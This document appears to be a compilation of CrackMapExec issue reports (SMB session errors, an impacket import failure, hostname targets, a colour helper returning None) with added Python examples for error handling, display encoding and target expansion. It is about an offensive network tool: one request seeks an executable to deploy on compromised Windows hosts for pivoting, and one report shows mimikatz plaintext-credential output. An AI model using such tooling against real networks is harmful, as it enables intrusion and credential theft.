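class SessionError(Exception):      # e.g. STATUS_NETWORK_NAME_DELETED
    pass


class DCERPCException(Exception):   # e.g. rpc_s_access_denied
    pass


class NetBIOSTimeout(Exception):
    pass


# Errors that mean "this target is done, move on", not "the tool is broken".
HANDLED = (SessionError, DCERPCException, NetBIOSTimeout)


def run_one(host, action):
    """Run action(host) and describe the outcome instead of raising.

    Returns (host, status, detail) with status one of
      'ok'      - action returned normally, detail is its return value
      'skipped' - a known protocol/permission error, detail is its text
      'error'   - anything unexpected; kept for a bug report, never fatal
    """
    try:
        return host, "ok", action(host)
    except HANDLED as exc:
        return host, "skipped", "{}: {}".format(type(exc).__name__, exc)
    except Exception as exc:  # deliberately broad: it only covers one target
        return host, "error", "{}: {}".format(type(exc).__name__, exc)


def run_targets(hosts, action, workers=4):
    """Fan action() out over hosts; a failing host never stops the others.

    Results come back in input order (pool.map preserves it) together with
    a count per status, so the caller can print a summary at the end."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda h: run_one(h, action), hosts))
    summary = {"ok": 0, "skipped": 0, "error": 0}
    for _, status, _ in results:
        summary[status] += 1
    return results, summary


def render(result):
    """Format one result as a tool-style line ('[!]' for bugs is our choice)."""
    host, status, detail = result
    marker = {"ok": "[+]", "skipped": "[-]", "error": "[!]"}[status]
    return "{} {}:445 {}".format(marker, host, detail)


def demo_action(host):
    """Constructed stand-in for a per-host action, keyed on the last octet.

    The messages reuse the error texts quoted in the issues; no network I/O."""
    tail = host.rsplit(".", 1)[-1]
    if tail == "40":
        raise SessionError("STATUS_NETWORK_NAME_DELETED(The network name was deleted.)")
    if tail == "136":
        raise DCERPCException("DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied")
    if tail == "35":
        raise NetBIOSTimeout("The NETBIOS connection with the remote host timed out.")
    if tail == "99":
        raise NameError("global name 'SMBServer' is not defined")
    return "Login successful"


if __name__ == "__main__":
    hosts = ["192.168.200.40", "192.168.11.136", "192.168.193.35",
             "10.0.0.99", "192.168.200.44"]
    results, summary = run_targets(hosts, demo_action, workers=2)
    for r in results:
        print(render(r))
    print(summary)
```

The split between HANDLED and the broad except is the point: protocol and permission errors are normal outcomes of scanning an unsorted target list and deserve a [-] line, while an unexpected exception such as the NameError is still surfaced (with its type and message) without taking the whole run down.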

from impacket.smbconnection import SMBConnection, SessionError

⚡ root@backbox  /home/its_0x08/Desktop/exploits/CrackMapExec   master  python crackmapexec.py
Traceback (most recent call last):
  File "crackmapexec.py", line 11, in <module>
    from core.maingreenlet import connect
  File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 4, in <module>
    from impacket.smbconnection import SMBConnection, SessionError
ImportError: cannot import name SessionError
✘ ⚡ root@backbox  ~its_0x08/Desktop/exploits/CrackMapExec   master  pip install --upgrade -r requirements.txt
Collecting git+git://github.com/CoreSecurity/impacket (from -r requirements.txt (line 1))
Cloning git://github.com/CoreSecurity/impacket to /tmp/pip-Ud3Plf-build
Requirement already up-to-date: gevent in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2))
Requirement already up-to-date: netaddr in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 3))
Requirement already up-to-date: pycrypto in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 4))
Requirement already up-to-date: pyasn1 in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 5))
Requirement already up-to-date: termcolor in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 6))
Requirement already up-to-date: colorama in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 7))
Requirement already up-to-date: greenlet>=0.4.7 in /usr/local/lib/python2.7/dist-packages (from gevent->-r requirements.txt (line 2))
Installing collected packages: impacket
Found existing installation: impacket 0.9.14.dev0
Uninstalling impacket-0.9.14.dev0:
Successfully uninstalled impacket-0.9.14.dev0
Running setup.py install for impacket
Successfully installed impacket-0.9.14.dev0
⚡ root@backbox  ~its_0x08/Desktop/exploits/CrackMapExec   master  python crackmapexec.py
Traceback (most recent call last):
  File "crackmapexec.py", line 11, in <module>
    from core.maingreenlet import connect
  File "/home/its_0x08/Desktop/exploits/CrackMapExec/core/maingreenlet.py", line 4, in <module>
    from impacket.smbconnection import SMBConnection, SessionError
ImportError: cannot import name SessionError
✘ ⚡ root@backbox  ~its_0x08/Desktop/exploits/CrackMapExec   master 

Building a standalone exe version

Hello there,

It would be nice if you could bundle your tool into an all-in-one executable, in order to be able to easily deploy it on compromised Windows targets (for pivoting purposes, etc.).

Have a look at the bottom of the README of patator to see some tricks for bundling it!

Cheers.

mimikatz output 'None' in user, password and domain

After the last update I got this kind of output:
[+] 192.168.7.13 Found plain text creds! Domain: None Username: None Password: None

The line that prints the above string is:
print_succ('{} Found plain text creds! Domain: {} Username: {} Password: {}'.format(self.client_address[0], yellow(domain), yellow(user), yellow(passw)))

The yellow() function has its return value missing...
Adding the return value to the function worked for me:

from termcolor import colored

def yellow(text):
    # Decode as UTF-8 when possible; on undecodable input fall back to a
    # lossy unicode conversion. Both branches must return, otherwise the
    # caller prints None (the symptom above).
    try:
        return colored(text.decode('utf8'), 'yellow', attrs=['bold'])
    except UnicodeDecodeError:
        return colored(unicode(text, errors='ignore'), 'yellow', attrs=['bold'])
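The display bugs reported on this page ("'int' object has no attribute 'decode'", the longname() encoding fix at the top, "Still some encoding issues" and the 'None' output just above) all come from one place: a colouring helper that assumes its argument is a byte string. The following added example is a Python 3 version of the idea, written for this page and not the project's own helper. It replaces the termcolor dependency with raw ANSI codes so it runs stand-alone; to_text and format_session are names assumed here.

```python
"""Display-safe text for mixed str/bytes/int/None values (added example)."""

BOLD_YELLOW = "\033[1;33m"   # what termcolor's colored(..., 'yellow', attrs=['bold']) emits
RESET = "\033[0m"


def to_text(value, encoding="utf-8"):
    """Turn whatever a protocol layer handed us into a printable str.

    bytes          -> decoded; undecodable bytes become U+FFFD instead of raising
    str            -> unchanged (the Python 2 helper called .decode() here too,
                      which is exactly what failed on an int)
    int/None/other -> str(value), so numeric fields such as sesi502_time print
    """
    if isinstance(value, bytes):
        return value.decode(encoding, errors="replace")
    if isinstance(value, str):
        return value
    return str(value)


def yellow(value):
    """Colour any value and always return a str.

    The reported helper lost its return in the except branch, which is why
    the caller printed 'None'; here there is a single return path."""
    return BOLD_YELLOW + to_text(value) + RESET


def format_session(session):
    """Render a NetSessionEnum-style dict as one 'key value' line per field,
    which is the --sessions output shown in the issue."""
    return ["{} {}".format(key, to_text(val)) for key, val in session.items()]


def login_line(host, port, domain, user, passwd):
    """Format the 'Login successful' line.

    The raw user/password values are what the SMB layer authenticates with;
    conversion happens only here, at print time, which is the conclusion
    of EDIT2 in the 'Still some encoding issues' report."""
    return "[+] {}:{} Login successful {}\\{}:{}".format(
        to_text(host), port, to_text(domain), to_text(user), to_text(passwd))
```

Keep the protocol-facing value and the display value apart: everything authenticates or opens files with the original object, and to_text() is applied only in the functions that build output lines.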

Accept NetBIOS names, hostnames, FQDNs as targets

Hello @byt3bl33d3r,

Could you adapt the script in order for it to accept valid domain names instead of only IP addresses?

(venvcrackmapexec)root@kali:~/CrackMapExec# python crackmapexec.py -t 2 localhost
Traceback (most recent call last):
  File "crackmapexec.py", line 3129, in <module>
    hosts = IPNetwork(args.target[0])
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/netaddr/ip/__init__.py", line 933, in __init__
    raise AddrFormatError('invalid IPNetwork %s' % addr)
netaddr.core.AddrFormatError: invalid IPNetwork localhost

(venvcrackmapexec)root@kali:~/CrackMapExec# python crackmapexec.py -t 2 google.fr
Traceback (most recent call last):
  File "crackmapexec.py", line 3129, in <module>
    hosts = IPNetwork(args.target[0])
  File "/root/venvcrackmapexec/local/lib/python2.7/site-packages/netaddr/ip/__init__.py", line 933, in __init__
    raise AddrFormatError('invalid IPNetwork %s' % addr)
netaddr.core.AddrFormatError: invalid IPNetwork google.fr
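The request above is to accept names as well as the IP forms that appear throughout these issues (single addresses, the 192.168.200.0-255 range form, a some-ips.txt file of targets). The following added example shows one target-expansion routine covering all of them; it is Python 3 code written for this page, not CrackMapExec's parser, and uses the standard ipaddress module instead of netaddr. expand_targets and its resolver hook are names assumed here: the default resolver is socket.gethostbyname, and demo_resolver is a constructed offline stand-in used so the code can be exercised without DNS.

```python
"""Expand target specs (IP, CIDR, dash range, file, hostname) to addresses.

Added example, Python 3; not the project's own target parsing."""
import ipaddress
import os
import re
import socket

# a.b.c.X-Y, the form used in the STATUS_NETWORK_NAME_DELETED report above.
_LAST_OCTET_RANGE = re.compile(r"^(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})-(\d{1,3})$")


def expand_targets(spec, resolver=socket.gethostbyname):
    """Return a list of IPv4 address strings for one target spec.

    Tried in order: a readable file of specs, CIDR or single address,
    a.b.c.X-Y range, and finally a NetBIOS/host/FQDN name handed to
    resolver(). Raises ValueError naming the spec when nothing applies or
    the name does not resolve, instead of netaddr's 'invalid IPNetwork'."""
    spec = spec.strip()
    if not spec:
        return []
    # A file: one spec per line, '#' comments allowed, expanded recursively.
    if os.path.isfile(spec):
        out = []
        with open(spec, encoding="utf-8") as f:
            for line in f:
                line = line.split("#", 1)[0].strip()
                if line:
                    out.extend(expand_targets(line, resolver))
        return out
    # CIDR or single address; strict=False accepts '192.168.200.1/24' too.
    try:
        net = ipaddress.ip_network(spec, strict=False)
        return [str(a) for a in net]   # every address, like the tool's 0-255 form
    except ValueError:
        pass
    m = _LAST_OCTET_RANGE.match(spec)
    if m:
        base, lo, hi = m.group(1), int(m.group(2)), int(m.group(3))
        if not 0 <= lo <= hi <= 255:
            raise ValueError("bad range in target spec: {}".format(spec))
        return ["{}.{}".format(base, i) for i in range(lo, hi + 1)]
    # Anything else is a name; socket.gaierror is a subclass of OSError.
    try:
        return [resolver(spec)]
    except OSError as exc:
        raise ValueError("cannot resolve target '{}': {}".format(spec, exc)) from exc


def demo_resolver(name):
    """Constructed offline stand-in for socket.gethostbyname (assumption)."""
    table = {"localhost": "127.0.0.1", "dc01.adyolo.local": "192.168.11.136"}
    if name not in table:
        raise OSError("constructed resolver: no such host {}".format(name))
    return table[name]


if __name__ == "__main__":
    for spec in ("192.168.11.136", "10.0.0.0/30", "192.168.200.253-255",
                 "dc01.adyolo.local", "localhost"):
        print(spec, "->", expand_targets(spec, resolver=demo_resolver))
```

Resolution is deliberately the last step, so a typo in an address never silently becomes a DNS lookup for an odd-looking name; and because the resolver is a parameter, the function is testable and a caller can plug in a NetBIOS name service lookup without touching the parsing.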
